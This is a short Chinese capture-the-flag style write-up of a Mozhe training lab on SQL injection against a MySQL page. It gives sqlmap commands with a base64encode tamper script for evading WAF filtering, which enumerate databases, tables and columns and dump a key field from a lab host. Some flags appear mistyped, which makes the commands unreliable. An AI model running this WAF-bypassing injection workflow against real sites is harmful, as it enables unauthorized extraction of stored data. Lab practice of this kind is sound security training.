墨者 - SQL注入实战-MySQL

 

按照题目提示,拿MQo=去base64解码,发现是1

 

 

 

tamper是使用SQLMap提供的tamper脚本,可在一定程度上避开应用程序的敏感字符过滤、绕过WAF规则的阻挡,继而进行渗透攻击。这里只要用tamper转base64encode  解码,其他和正常的sqlmap用法没区别

爆库,sqlmap  -u http://219.153.49.228:44096/show.php?id=1 --tamper=base64encode  --dbs

墨者 - SQL注入实战-MySQL_第1张图片

 

爆表, sqlmap -u http://219.153.49.228:44096/show.php?id=1 --tamper=base64encode -d test --tables

墨者 - SQL注入实战-MySQL_第2张图片

爆字段 sqlmap  -u http://219.153.49.228:44096/show.php?id=1 --tamper=base64encode -D test -t data --columns

墨者 - SQL注入实战-MySQL_第3张图片

爆字段值 sqlmap -u http://219.153.49.228:44096/show.php?id=1 --tamper=base64encode -D test -t data -C thekey --dump

墨者 - SQL注入实战-MySQL_第4张图片

sqlmap一把梭就是爽

你可能感兴趣的:(墨者刷题笔记)